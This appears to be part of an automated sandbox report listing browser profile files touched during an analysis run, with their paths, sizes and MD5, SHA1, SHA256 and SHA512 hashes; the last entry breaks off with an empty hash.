23a88cf966d7708d682c4833a2a9edc276fed2ec92223978bf809c394d82dd5bf88d1daf74fd6963c179d7a650cf161f2983429caebf42fab9d1dec2e0d192f5

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
169B

MD5
cce1508516c8a25fd2e4647b26e1de47

SHA1
4f383ddf86767a380903ea769362df6e00daad9f

SHA256
72270fc516829040813f50f2813a3f322fd5e6336e060dbb73497edec5316ca7

SHA512
2dabbe751d09149bc2661e3ee5b69ae92c2640005dcc8405126714a85c1caa093365bad1835e011e9628930a060049c0f6551d56069291c3750b48c6c1d89d22

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
162B

MD5
974ef48d03ae831f1a2f26ed726a1894

SHA1
676ad2503742519facd4ef27974b0f5dfacc53b6

SHA256
c013368bb11dd374241e373a1bab844ce4d9703a9774a4d1248ea6c2131bc7b4

SHA512
e033295f0497baf00a1b891007e6fd8a01584a49a934a7fb607d36191fae745b7119c80e0371dbba6970aab97470910fcaa8ddad35051cbfb53ce52a3e38998f

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
145B

MD5
1cb5a1288b9d17f506d6dea5cb6f134f

SHA1
8afca6940e97da8fe75868280166ebdc71276f02

SHA256
3b343ba8169fbaa58db328d77a899fe51dd68e36e7eeb0b214e70e599387db93

SHA512
f5aee911c58a61da7de7119f79c2455d22eac9dda35c70526c79a46e9bc7b05f76986d2c9c2c8dd0afdc1481691275baea6aad7954d6651f5d7f0c2d9f38a6ab

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
978B

MD5
9602def6d26029c3f722049a3983ac42

SHA1
8aee26499e122f533bb67fffe106589b84a88dda

SHA256
cb66393a34384b597638c93db91521375c20d6ee4da7104d67ed417272e4216f

SHA512
2205daeca984a489d629dae557e83debf93d3ed799b62eacdd136119b4809d3f429cca0a7dea9f1aaa687c6943088cdd794f5402f6d1201bb1f958776094ec36

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
638B

MD5
27e8a1449702aeb2c08ec7ab3572e294

SHA1
003133d40b30c5dbf09535e2056c379b87d34405

SHA256
753108f27350e3f1314f21879dd891e9055caa1fb2d91f035fdd2c4ec9c29535

SHA512
ebcbeeff1278e11d3467dcae2fb365c960763e13e340107c776c1f02f5778e06b82f2961416bd81255c7d848d6ed5922650ca198d05c4f1a6136720b5dd0b004

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
631B

MD5
551a35c3828d093d0254909bdd65fe84

SHA1
6e44bb67398699425c1055d3552b89cccbc94832

SHA256
c3d56d45266f224f7eb6ea3c5dbca1cb372d5a05674680f9f134b6261384130c

SHA512
4d1592f36b0aa05bbfa3726cf740e8661cbe6900800e9b40910db63d99591292e9689cbaf6169ba2aa57cfeb7f8fbfec5fde6d64fc94986b1fd1d254e30c845b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
162B

MD5
8c370fd810b8b62aaa69f71072080829

SHA1
a9b453ea445c817013964558dba1f07fc5e033fa

SHA256
9130f2839904b7a9c948d23ec22b2842a5c23e8a5423e0fd61301e5e64741129

SHA512
0aca5d7f3d5e9a9d3cb08150fba1ad080b5c0728dcc6b1cbd83d54b8554eb5b1faa5b1f01d161b31b598d5de07a64cf5edf2e6ec40c3aecbdd3dce203b54bfbe

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata~RFe5a5100.TMP

Filesize
971B

MD5
323c2c7b1c625c3bd60e2af23d8ae60c

SHA1
fd14bc3a367e040161b851a23b841a8303b0b459

SHA256
eb7bb9f29946008512f5f976b2679baa38fff3e19e6361f3c2ed715f119533f9

SHA512
e22c8865966757651d322f9dd67c0403c876c60e5d398955aabaa053896b3861f56b811ab8da144aa77266fc780644ccb8e4ae32150dca768d79306fc42da09f

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
3b2807207504759b1067e4dae973d47b

SHA1
4905c8d1386417ddec63efd17a507dc26d92bde7

SHA256
c1c468bf74caf3259c3d49e02dbf8411ac75cef40475c415639b88d58a7c4579

SHA512
88313da6c64157741047ddf3ad7f52f5e3894009fad0806e24d26a485821121b12c96e47c13536dd5d3d60f76be8e3e164815187d233a752cef7e521e583c017

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
993ba4e614f9ea421c7fde0a79bbeb91

SHA1
e2720fa55637605cff48c592d609e3bc2a404ffc

SHA256
89e3ffddfe9d1d9da932c0acfcb5d72d43372bee3e4683f1cc54cc099a915b28

SHA512
c4e4efab37c20cd069135d723aab1b099289d0ad055c5d9bb89a677cb767af1fc980e80371f448b7e897c73c8a5ade3ab4caeeab2bd4f7ec3911de8908b9a323

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
83ca4659bbc630e307ab3a857d0dc1f6

SHA1
98431396da6477fa43c32bed58eb9de8ba373757

SHA256
19af80e117e6f5a235db4594815a7ae23812204e1d1f6df25d17615e989cbde0

SHA512
4a08f791ebf5220e08d7fd4063ae1bad5ba2335090ae73cdd5d76ef510043858b59265a34c476cf840b2fe4fc1c5d6414e85386390dd2e00310e095e9c243c04

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
12c5f03c33c70cc81212a228dbcb4181

SHA1
2663b8fd7e3fccb1c652eb8458b575593c7824bf

SHA256
1e399138b8b27f7d1cc43b7149938bc2b6577e875606d6dbfa898eaa3e177272

SHA512
6c73f00207445209a92e5eaa9eed7732a69d95ece0ddb503746a028f7d930258f5e8a423b314184026187252de4605af3df83f457160d030be509f040a6e5889

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
cd70875424bf08d6141304419e59438b

SHA1
eb69fe1ff6ffd7a88cf44df50e21cdb92b6fbbfd

SHA256
635511d05daa3ed19cdfc0b1a4233f71cfbffcfbcd4f61a6d1c3391a42d8c930

SHA512
991c6ed18e5f923a9c2525d50525c48fbb2314cf953de48464ff8947f1668f81a188e23f06f89548ff76a59fcba0cca6c92dc164d4eef34aa8276082764404c7

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State~RFe5a4b52.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
dc89cecee79cf18ffab91e98f530c80f

SHA1
a8d0b4126c077ca5b1d01cf94ed0ff5d6e65297f

SHA256
0433d43452b6e4b756435fd93dc9056fac8c63510803679116bff404dd315500

SHA512
ec8bd14d9d1ace365144318f0758ad6e9a2e4fe1986fa92c7fd43d2e62638a0158563280788974eb4b2611d2e8231bdc9b4864630a6a3ad0b121108dfbcd0705

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
833553f5016afa6bb94093218c6a8245

SHA1
bf6479e935c8b3b9d2c96d13709322ba5482a679

SHA256
d29836e33a01380ce2f57fbdb5cb49ae98db1c15b0c397ab880b1d452dce6a4f

SHA512
8ba7ffe5774d1a9b7a855474a3af77bd7a315b1cc0fc8eb4af1fc5f040aa0a2ea66f6b260e259188b5f397ce3eb30e4f075b8c2c4a1f9ec50caf942a6735522f

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
0d0ba1a38828c5e05b71d48b2d08849d

SHA1
304ca511bbfe006d065a833f07bfd8d2f9098991

SHA256
634270500708e248f999aab023d6cf5c816f5e044e2cb141d5c742707b213294

SHA512
40465f27a1ada1e29a4fba4eb1c18960211763783c81ea446cf4308cd5dc8a7145939a8503d08f5fe2f1fe1f8edd631532060885f444c9aefb3009c70052d3b8

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
aad7015bfd3d114daa41eed50250db0c

SHA1
f097bca14f96da0478564cda6544524ecb0fdd74

SHA256
25a8171f71d0633cda896b202ced3f06a3f1f525ed620ed5c9fbfe835b8f4418

SHA512
d88b6e2da173bef22441b5421070913b1262d4292ec4b11ef18a435d147d2aa6af4772f7f1910a238f4f8d3c1677a1b5231d0e8cd266086041e24e7ec4b1f8fd

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
64ca2c27d760d4ccfb7a32fde869d6ef

SHA1
09ae8dde6cda005cba440e9e7a0a68645d5edc08

SHA256
684754d18c89fd822e7395dc5f0f06824055c0f14c053ebdf235dd821dd7f185

SHA512
94c57fea85023c9e6e078226f7d976b75da879efe83868da009176624541e5f8e88212e6cd5d92cef8ae2d8f658b1f0a57cc461ab9796ac3de59d79b8d26a9c6

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
03c77c78a4171111a7ddceb10cd90be1

SHA1
4e3ec3bd6bf39db5699170fb0ebf7473df409d82

SHA256
8c5627825c9fc464db0fb052f91f89bd2a6130effc5ba14ca1164faa66167982

SHA512
41be2f7724fac40b284f9179b826e46d494edebf3f2177ec29c25c253cb33904bd4ba6f8001779600c28cd20f25491fb00e299394c4ead565dbd5b986711d6e7

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
e3d8065c35888736ed85c7b06c09ec0e

SHA1
c77660994e0647d90525b49913a09fae2c333bd9

SHA256
3939781387a953cb5f5bcba8fd2aaff567fcdcb8901704a506858f9b2046d429

SHA512
f06a59a17a5973e117b0160d01b1bb3c62edfa7caf05b7c3bc34084eda2b31280929dfe38eaaa18a1bcbfdf83c78659e4dae4b21359ccef4b840bdc5ae64e278

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
87543d87d230f665b2e5ab293a370a37

SHA1
870e32143fdb709462432b4cbb91c34d86b65609

SHA256
076b9005e3e39df009552497f6b120ff8c330ff4c3f972dcbd255c8b8081a7c2

SHA512
90b82d40f6aa0b0a44de243e065b3a3e5f3a5f49d13f90cab410cfe8675e8b4df34d3d092dfd1ef7cfafd63839b12be25e0bbbad0f4f225477e7185fcb7f7a44

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
376d1c6384daad4cf3a193c55eb67e6a

SHA1
d8f58ad5e2786daa239455916de8badb4eef5588

SHA256
f1d03b8fc8ec9e6921303a7cacaa21a969862930c059fdff6cc56424cbbd9061

SHA512
2004d7d96b3cf9c98c98f9c9b95f1c73942a807fa4f2773cdb6d3a40d2d7ede59be0dd7d4336cb4f6fd730dd318a8914aac6d88b24e1bf5be16796e7646fa771

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4ee3253c6498f4116deb00f2048dd193

SHA1
15426ebafd61c64fe318e365e8951702bab12d88

SHA256
db0db99818d45afe6146463ece556c151c9fb51813a1c8749fc6a69720833e01

SHA512
5ff1adb37df4d3f4273a3fcf49ca53aa809df7b55d6ba83ed39c667a7f001e423442dde9ee6f3eba11eae7e5bc1bb4a24f0b7accc57d695aa11f6f1ee98ed912

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
b02134e64e7884fca041d80676cc1143

SHA1
9934b104e08028b240c921f557ee0b15fae8d4d4

SHA256
5503620772b9236b0364d61f02d76dbf6e6370506a24294a8e9ad9d3f09dea56

SHA512
98755cea4eeaaa9462f1120ef7336bbf99b1e833237db857f8b99e4ef690988133e74ac9edff901e47f9f7c84f8abf843b9dc171f6fd7f21ea23119e626c7cbe

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
cc1ca0f51ea0c7a3568165abbdbebbcf

SHA1
708fb389f081ac1d98f09a75610726085fd41228

SHA256
153b0d3e8678ab14f3267cd709f43b0d719136228d242d0c9af165ab829f3bb6

SHA512
fbc2c06a472c96700d6b898c1bd85e5e2ca14edd28a66aaf18fe78b05b3c1173ce322d01cf18e3748c7268832afcd3009102d62b4d0b9f0c3ec54cfe65e949e6

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
346ce4912bf988a974597a20b17cd27f

SHA1
281b58d58404932b5802576beea549b063624fa8

SHA256
73ba186d283c636b6de22f5a72a957b00633011e3ed59a15d7808da2144e584e

SHA512
08b87a725e1a5652f45d69bd62818900610a8ec8c84d90aeeb577c0043337f14900d2970b391ef96af7bbcb62acd6b7ed12b071396ec84db0c4d6a0425394db5

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
52223b4be31ca951d6c82b2a5bfe91c8

SHA1
8d1e249dffef9887666118e124f1cb1ba4a4ea6d

SHA256
73f5be4787d8724025886a08600e1a94c056d3ea40e903fac3529fb01d953f3f

SHA512
0b09f0f2d8366a612adf5fb126e40b730e070eac51fd87dfa8c56ffbfc1f63678d5c14ed309ceb1a258bae8bb61af7d4b42d6ab6fb51c5939015a02e96c2e769

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
a8d88a501d76cb3d77adeafb67045eb3

SHA1
377350f19da92e4d1db619f3f72e9fa107eb51c4

SHA256
3b62a631cc92176ff0f426309d6b10abf33f5c59c556144596a497cee4de7422

SHA512
7feb52a3229462b23a87f04d26d8bead95ba86e37b0bb881946500777afe1a1315016e8014796ba3de303097cbbf54dc4fcdc164edd748b6d37caf2cc0209d1c

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f9d654fc25aa425bfffc4a75871571b7

SHA1
73d5a52570cd07bdb263bb03bcf2fd3a08217ea9

SHA256
64fa685e49697ba203f903abd32e3e3e74c891313660805a0f3cc9c02314a4d4

SHA512
1ba5b0be004a9b7dd58b8c23ad3a17bb0a2f1e04aa23c5e58852e9d7978aa6ba06f72f8d5f0c53daef5ee2e6732b9e40a75632436a3a9de9f9124418b60ff54e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity~RFe5a2f9d.TMP

Filesize
1KB

MD5
f596af097a2d946147d2d0944f3a2ff5

SHA1
59d6f8c477c6c124d2329901923205607944d888

SHA256
405fd5fe092ebb73db78663fac5bcae12d57e5351789505a13c635d6641dcec1

SHA512
98bac1fd6d66a4d9a0404f3bacfe21ef5ddb4b6d5ff143a93af75e4fb498e94bd20bc1f2457a026669a4c95814cae52a6de271ab0b4ae34d010bddabb5ed1723

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences

Filesize
16KB

MD5
a529dfb2230d12f544ea2f5e26f6d373

SHA1
9484b7c4c17c2e02e8aa48a8162c4dd784ad2843

SHA256
e16a1ab51a8f07a382662509bb7fe6765b81a6470e7aa6295150cb248be021f7

SHA512
6cd19e44cecaaf80245fe2f7afebf61e00fac93fc933e3c712afc728931e41c6b82c0d9015adfa9bdbd6d0817858215807ae318d49886934c97a7f2b787f8adc

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences

Filesize
18KB

MD5
c7aa2573140fd9fe6ee4b8b0de5296b4

SHA1
ce244efe91a7f589b748f29e4d5790a93a750c59

SHA256
530098b707b22d94f15885426ef60c8389df51cc3394b1795861d37df978cccf

SHA512
979495b49634e84d5c48934c37d0b3d98a8bd14ff77c70d65646ff694ff14fecca1b19e307a773fee6368b307e94a508ba5acf314285a3c9fa18b9166fe1d05b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences~RFe594c32.TMP

Filesize
2KB

MD5
569d4458cc420661ea0e2b021e705c9e

SHA1
70798ad4e4aa3dc83ce3c8c5b3f69cdb2bfb4916

SHA256
d94ca26a1c4dd84d4883e532ffee9ecd9eb9385fff5285623d53a7b07afda49a

SHA512
98741319592a6b09ce1844fae58fd3b6e7abb755b71acf073fa4d994f38360a903e49294e31ca03f3ff4edd22a84825bf5bca334012986da9efa1f34b99f7138

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Secure Preferences

Filesize
7KB

MD5
03b50a54ae71f200c029c4bb9a6c641d

SHA1
fc39099497cfce10fca483fdf65767269298c035

SHA256
cd63006204bf6a32184426e19061cd7c97101d8b556d9531ad04c72ae4666954

SHA512
713a59bad7cd7b772954b23dd86ec1d669b251e343907fc1aecb15693979712f21febc53f78d7bf4b6dac3bb99de9f8288d0ca5b4601c337df4dbfea977ddc20

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Site Characteristics Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Site Characteristics Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\blob_storage\b6485802-aadd-4601-b436-cf5cd82ffa38\0

Filesize
1.1MB

MD5
48f85cd9e56ef3716cb7d4cbf4c33994

SHA1
477b9f94407bb087c96a6a4d516d2f662c6e7d80

SHA256
614e7b9f8727139d06f4e894ebdd97fd6daa48abcbc3979e5faa6a4e8ad6438a

SHA512
644effff4e7b1fb9870bb11f8d6297e2ef8d4cd1e876b8ed53045c7b281580d235cfe21b968a75f1512d6fd8fb15535fd477f177fd3b6d05d4ad5f59fbd62bb9

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\FileTypePolicies\67\download_file_types.pb

Filesize
7KB

MD5
d28b6246cba1d78930d98b7b943d4fc0

SHA1
4936ebc7dbe0c2875046cac3a4dcaa35a7434740

SHA256
239557f40c6f3a18673d220534b1a34289021142dc9ba0d438a3a678333a0ec6

SHA512
b8dbebe85e6d720c36dbdae9395fb633fb7028fecc5292498ac89276ae87bd6de36288fbf858f3476e18033a430f503acf6280596449dd0478b6ab7139f3cea6

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
50KB

MD5
60708cb5cb2419fbe7460bb6d8870bb3

SHA1
0be1fb6d61ad002482b634a0333c1c3d7862144f

SHA256
6fe099f14a039a54c02243fc90f1a530e184b73a6973657d76d3658e13184852

SHA512
fd9340f472d30c7cf7d63dd8dc116a1b23a94415f3c6e4d7dd1d976e045ea011c2f93d267a8c7f79dafad727b7a2ba4c5951e167501155b4c5ef459db5603ee5

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
51KB

MD5
183a81607ece3cb11222f99b651f8e7a

SHA1
b89a86834ca40760f40f1f20e698fd36cf9685ed

SHA256
60baab98d75d42692c3c5bb382f3a35b4c87b6efb87e599ed92c9ebe61dee3fe

SHA512
c22b18ad34ec57c9dd1a39af8afbead2364b01dc0e0b3fa2a6d714b0d1e49fcbf372797e5cfafe835fd07ea331262e2d34419f975c251f1115b061add55e62bd

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
57KB

MD5
735918fbdc7a59137ca20f2ff4651740

SHA1
84df3230fe9ec734fc5dc9298e8a22198e39c24e

SHA256
ed7bc312969c20e363f19176df35eb2eeee70139d76d1b34e8db08e1993587e4

SHA512
a6b8b50e0dfecdc40a4dba18788434119f284ef5d723e4ce82d71a57320d0479601419d571b1016bbda8f76b7c868e3263c800bfc6418671457f84ff962ebfa3

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
dbc53bdc9a187b762b0b1af996ee5fe5

SHA1
09f7c42e273427e6dfb118f93adb2a7136945ff6

SHA256
f09fb251d6bb4add05200ac58a05a85230a035117cb921cc32fb37bdee9a88ba

SHA512
9884af71d6628ccede895e7de75b9a78999947ca93d5273997f659a5c13f0ff50a653a291ef6913d4551b3b853755a8073fe63f88640f981edb5e739824766a8

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
51KB

MD5
a4d087c01bac6a5249e1a2a786e6c845

SHA1
c9d372aedb21b5d7f2005715f41081ccc4a68aca

SHA256
154b311088be628d283e50565c38f26654fd9f95bf5fe36b60d93f68c7eb0312

SHA512
8693d19483608381d805a897dc87f8d6348b6259de622746d3ed949a4ba5a16e95d059cbd3970dcc9a8dba6281feea44ff192e8c65365f925c2f1e6b1660d794

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
62KB

MD5
5e756273d4a705183cce4e156f6bb87e

SHA1
00f13f07a1eb8ddd08828c8b5d6a6c1c1bf1e7d9

SHA256
bd19a25a5c10c8f35a7233696919653d1fd4b0709531567d94e5e69c63ff0697

SHA512
2f143a1f61ec15a2c8f2227c8d482696f4156d1364d2d2cbc6d221d2009d62020168f3ebc1d47d450bb41066810fc1a0d39f4d394a4008cbe9ba20c907b97ff0

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
60KB

MD5
5b229bf7e9967def2969febcac0188e7

SHA1
525e165b024a1497b7cc9bed0d73a781c6228b37

SHA256
7b4634bba00adc778a0843cbd3b1930820a8ad170e5d51f88e03b13f084af594

SHA512
62b8a1e20d78b98a9f3a414a3a59bd96293eae30f11ea47ae1c43539e05c0d3a0f59a89a8a8409b901aa34f4e50cb3e3ba5c3dffe8fae6a8c3ad7ec348565b14

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
60KB

MD5
63af4e72f54cbdd9597dbf255ac58dc9

SHA1
43e370c1f290e2cfe8108cab6d2e329dbcc253a9

SHA256
6fef5abc01902eb4d4cb9b61f9ece4d2222c25e10cc5321b9ac1acb70f1a9045

SHA512
860d77304ed08e63e090288adfdd6c1675229a6c2f619d97fcb0b38aa4a40a4c026a2a538d11536d5c1607ad6a875dd8aeb345b939b8a7dc07addacc3372794b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
3b07fb65bab53afa73339b9b2d3fe521

SHA1
ddf233239cdd39d430bee586a96f8885c117ea70

SHA256
c9ac4393a4feb17e18b67149900580f13d41442a3d535d885137009f4288e7ed

SHA512
7adf4c8326556d922e4f4e5e348d8f8aae9087db420ace417bf6b6e4e843327b7c92e35b2674e3bc60a28326736310a2b2d56d00d911deeef629664e2d008287

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
eda528e61970818e70fd6e29f6a002df

SHA1
8999e34d0da1becd700590047b2d5561efc00608

SHA256
a1ba8d23005c270c190d8b040c53bb98dca0fc44f1d887cbc1a35a64bb682ae9

SHA512
1161e6c9676d4a221658bdd865ff0f581c194d1025d6ed5d59304acccdaeeb97421a9d3f1df2cec92068049d94d04fd8b310bcbb57e58961cdf4b26c54c38d73

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
8ff14c6b2dab495c0e109ade52382449

SHA1
1a52c66939771580bdcfb16473e25430a6f95e4f

SHA256
5e3457d5eb4ca653ffb22f2271e52831742fc0fb0dbe7d23f91f1dc9637881d6

SHA512
986ebf2515a60ec3e66d39811972e737db8c30afe051325040f250c13489e8ff0164149da86f218ede1e76b4bd23aee7e4cc8a30f57e1885894891f4fb2349df

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
617b91ac58a3315790efcbf1ef76e950

SHA1
63c700b000219a58de2f07d0825129ae2fc3db64

SHA256
32dbfa57112b16e5b8ffecbe37dd97259463a4bd2dd6dff438fa604146cdfafd

SHA512
a5ca69553985f09c2649079f7c31a9a087613deccb729e96bba47714f9bf5dead2b427bea8e13d0d14afa68fa8526e6f38b6e0e92dcd1d8860e1965640c715d5

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
6KB

MD5
73d3588de59c676d66148b6ef7434228

SHA1
996f4eeddd5a2c4ae0e02df9e47ea281aafcff20

SHA256
79e8dc188c9c6e62689d0610e275fb097f9612b27bb5d40507f488b65822a761

SHA512
7b063037d80b126f490312dd9680c02e9fb6269a7262ec9dc775b7696dc80c6d0951b1848b1b60f5c07733f4f064945f8752e317c3b40aaf0003cc3d2fc709c7

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
941f0feceb9b9586fd88fae313720cc7

SHA1
e1d09aeffda312d895d9cfb4674aeccfade07616

SHA256
9d6566ba641d4284e4a31d23eefa20bdab1ee8c7b62583ca3d888219925793c2

SHA512
015515372c72d779796ee29af078715f2b860f36d17fc8d827e90160001a8ace2c131b9a44c168fc809f1a3080830fca2e7578764c1a2199805ddba59745392d

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
6519e2ec79634b3bcaa603435f9e5efb

SHA1
63779951de3f11c160cee2709b0d43fcfbacdb47

SHA256
9a6da38c5203a6d2d077e15393e442ee17fe5fa2d07dcb92ef4b574bcba7a943

SHA512
736ef0344cec5d4d2ce50d191ecf9424a381e3d4fd0faa09189e3fc0f84bb8d29d69eb816a7b1e13d3c44714e08e1e7037a784569081da178bf305be69ef3f52

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
5da2c57be5d5120a506c5eceeb606387

SHA1
54bff46cb759775a05dc3a75c42548a158eee1fe

SHA256
acac88363115079c8cb2c0263725fe4a7f3516ac0ee64ca1678ad347f86ea04b

SHA512
